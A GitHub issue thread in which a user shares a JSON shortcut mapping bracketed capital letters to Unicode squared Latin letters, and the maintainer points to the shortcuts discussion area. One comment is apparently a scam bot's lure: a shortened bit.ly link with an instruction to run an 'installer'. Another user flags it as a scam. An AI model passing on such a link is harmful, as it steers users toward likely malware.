### ISSUE TITLE
[.JSON SHORTCUT] Squared Alphabet | [A] → 🄰

### ISSUE THREAD

**Issue by ThomasEricB** [noam-sc/obsidian-enhanced-symbols-prettifier#8]
Since nobody has shared a .json shortcut here yet, here's mine! Transforms capital letters between brackets to "Squared Latin letters" from Unicode, ranging from codepoints U+1F130 to U+1F149! Not sure if "Enclosed Alphanumeric Supplement" is widely supported on multiple platforms, but it displays fine on Windows 10.

[enhanced-symbols-prettifier-squared-alphabet-export-2024-09-03.json](https://github.com/user-attachments/files/16841998/enhanced-symbols-prettifier-squared-alphabet-export-2024-09-03.json)

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by ThomasEricB** [comment]
@noam-sc it appears that @zawa999 is a scam bot, it instantly commented on this issue. Please delete comment.

**Comment by noam-sc** [comment]
Hey @ThomasEricB, thanks for sharing your shortcuts !

You may post it in the [shortcuts discussions section](https://github.com/noam-sc/obsidian-enhanced-symbols-prettifier/discussions/categories/shortcuts), as it regroups all shared shortcuts to avoid being mixed with other issues :)

**Comment by ThomasEricB** [comment]
Oops! Thanks!

See: https://github.com/noam-sc/obsidian-enhanced-symbols-prettifier/discussions/9
